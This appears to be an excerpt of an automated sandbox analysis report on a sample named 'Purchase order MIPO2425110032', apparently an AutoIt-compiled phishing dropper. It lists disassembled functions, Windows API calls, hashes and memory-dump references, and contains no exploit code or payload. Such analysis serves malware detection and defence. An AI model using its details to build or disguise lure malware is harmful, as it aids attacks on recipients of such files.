                                                            • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                            • Instruction ID: 8cef491be29f454a022c26a2c870058fd7ae5d5c57e9894b1fd86f1df2e444a3
                                                            • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                            • Instruction Fuzzy Hash: 2041C4B1D1051CDBCF48CFADC991AAEBBF1AF88201F548299D516AB345D730AB41DB80
                                                            Function 03FA34F8 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048696009.0000000003FA0000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3fa0000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                            • Instruction ID: 1fdea3315b07c26934efb35783851031a4bee361b59dc27db76147ab03367df5
                                                            • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                            • Instruction Fuzzy Hash: 7C019279E10609EFCB44DF98C5909AEF7F5FB48310F24859AD819A7701D730AE41DB80
                                                            Function 03FA3558 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048696009.0000000003FA0000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3fa0000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                            • Instruction ID: c101a9eff9de5878420f24f5706b08fa53d7b396b5c4234981927987deb37413
                                                            • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                            • Instruction Fuzzy Hash: 5B0192B9E00609EFCB44DF98C5909AEF7F5FB48310F24859AD809A7305D730AE41DB80
                                                            Function 03FA1EB8 Relevance: .0, Instructions: 6COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048696009.0000000003FA0000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3fa0000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                            • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                            • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                            • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                            Function 004594E9 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DeleteObject.GDI32(?), ref: 0045953B
                                                            • DeleteObject.GDI32(?), ref: 00459551
                                                            • DestroyWindow.USER32(?), ref: 00459563
                                                            • GetDesktopWindow.USER32 ref: 00459581
                                                            • GetWindowRect.USER32(00000000), ref: 00459588
                                                            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                            • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                            • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                            • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                            • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                            • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                            • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                            • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                            • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                            • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                            • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                            • ShowWindow.USER32(?,00000004), ref: 00459865
                                                            • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                            • GetStockObject.GDI32(00000011), ref: 004598CD
                                                            • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                            • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                            • DeleteDC.GDI32(00000000), ref: 004598F8
                                                            • _wcslen.LIBCMT ref: 00459916
                                                            • _wcscpy.LIBCMT ref: 0045993A
                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                            • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                            • GetDC.USER32(00000000), ref: 004599FC
                                                            • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                            • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                            • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                            • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                            • API String ID: 4040870279-2373415609
                                                            • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                            • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                            • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                            • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                            Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSysColor.USER32(00000012), ref: 0044181E
                                                            • SetTextColor.GDI32(?,?), ref: 00441826
                                                            • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                            • GetSysColor.USER32(0000000F), ref: 00441849
                                                            • SetBkColor.GDI32(?,?), ref: 00441864
                                                            • SelectObject.GDI32(?,?), ref: 00441874
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                            • GetSysColor.USER32(00000010), ref: 004418B2
                                                            • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                            • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                            • DeleteObject.GDI32(?), ref: 004418D5
                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                            • FillRect.USER32(?,?,?), ref: 00441970
                                                              • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                              • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                              • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                              • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                              • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                              • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                              • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                              • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                              • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                              • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                              • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                              • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                              • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                            • String ID:
                                                            • API String ID: 69173610-0
                                                            • Opcode ID: 5c79b92763c8014ff546f30321fedd54336918ef6aa641c4bc50dafe0e0cc36e
                                                            • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                            • Opcode Fuzzy Hash: 5c79b92763c8014ff546f30321fedd54336918ef6aa641c4bc50dafe0e0cc36e
                                                            • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                            Function 004590BD Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DestroyWindow.USER32(?), ref: 004590F2
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                            • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                            • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                            • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                            • GetStockObject.GDI32(00000011), ref: 004592AC
                                                            • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                            • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                            • DeleteDC.GDI32(00000000), ref: 004592D6
                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                            • GetStockObject.GDI32(00000011), ref: 004593D3
                                                            • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                            • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                            • API String ID: 2910397461-517079104
                                                            • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                            • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                            • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                            • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                            Function 00403A20 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                            • API String ID: 1038674560-3360698832
                                                            • Opcode ID: 5ac0d074d0f2c4f3e64cea3940d5eb1af2dab97db6e12398ad8f12eee9a98506
                                                            • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                            • Opcode Fuzzy Hash: 5ac0d074d0f2c4f3e64cea3940d5eb1af2dab97db6e12398ad8f12eee9a98506
                                                            • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                            Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                            • SetCursor.USER32(00000000), ref: 0043075B
                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                            • SetCursor.USER32(00000000), ref: 00430773
                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                            • SetCursor.USER32(00000000), ref: 0043078B
                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                            • SetCursor.USER32(00000000), ref: 004307A3
                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                            • SetCursor.USER32(00000000), ref: 004307BB
                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                            • SetCursor.USER32(00000000), ref: 004307D3
                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                            • SetCursor.USER32(00000000), ref: 004307EB
                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                            • SetCursor.USER32(00000000), ref: 00430803
                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                            • SetCursor.USER32(00000000), ref: 0043081B
                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                            • SetCursor.USER32(00000000), ref: 00430833
                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                            • SetCursor.USER32(00000000), ref: 0043084B
                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                            • SetCursor.USER32(00000000), ref: 00430863
                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                            • SetCursor.USER32(00000000), ref: 0043087B
                                                            • SetCursor.USER32(00000000), ref: 00430887
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                            • SetCursor.USER32(00000000), ref: 0043089F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Cursor$Load
                                                            • String ID:
                                                            • API String ID: 1675784387-0
                                                            • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                            • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                            • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                            • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                            Function 004308EF Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSysColor.USER32(0000000E), ref: 00430913
                                                            • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                            • GetSysColor.USER32(00000012), ref: 00430933
                                                            • SetTextColor.GDI32(?,?), ref: 0043093B
                                                            • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                            • GetSysColor.USER32(0000000F), ref: 00430959
                                                            • CreateSolidBrush.GDI32(?), ref: 00430962
                                                            • GetSysColor.USER32(00000011), ref: 00430979
                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                            • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                            • SetBkColor.GDI32(?,?), ref: 004309A6
                                                            • SelectObject.GDI32(?,?), ref: 004309B4
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                            • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                            • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                            • GetSysColor.USER32(00000011), ref: 00430A9F
                                                            • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                            • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                            • SelectObject.GDI32(?,?), ref: 00430AD0
                                                            • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                            • SelectObject.GDI32(?,?), ref: 00430AE3
                                                            • DeleteObject.GDI32(?), ref: 00430AE9
                                                            • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                            • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                            • String ID:
                                                            • API String ID: 1582027408-0
                                                            • Opcode ID: a7cf9b009f0fc1427fa9122de835988eeaa5bfd4ae15f23b8ce418ed36741d1b
                                                            • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                            • Opcode Fuzzy Hash: a7cf9b009f0fc1427fa9122de835988eeaa5bfd4ae15f23b8ce418ed36741d1b
                                                            • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                            Function 0046B9D7 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CloseConnectCreateRegistry
                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                            • API String ID: 3217815495-966354055
                                                            • Opcode ID: b703d7911cbb2b9a1b8a55fbd60617da6949817c0165a24d00aa1ab6907a89d6
                                                            • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                            • Opcode Fuzzy Hash: b703d7911cbb2b9a1b8a55fbd60617da6949817c0165a24d00aa1ab6907a89d6
                                                            • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                            Function 004565B2 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 004566AE
                                                            • GetDesktopWindow.USER32 ref: 004566C3
                                                            • GetWindowRect.USER32(00000000), ref: 004566CA
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                            • DestroyWindow.USER32(?), ref: 00456746
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                            • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                            • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                            • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                            • IsWindowVisible.USER32(?), ref: 0045682C
                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                            • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                            • GetWindowRect.USER32(?,?), ref: 00456873
                                                            • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                            • CopyRect.USER32(?,?), ref: 004568BE
                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
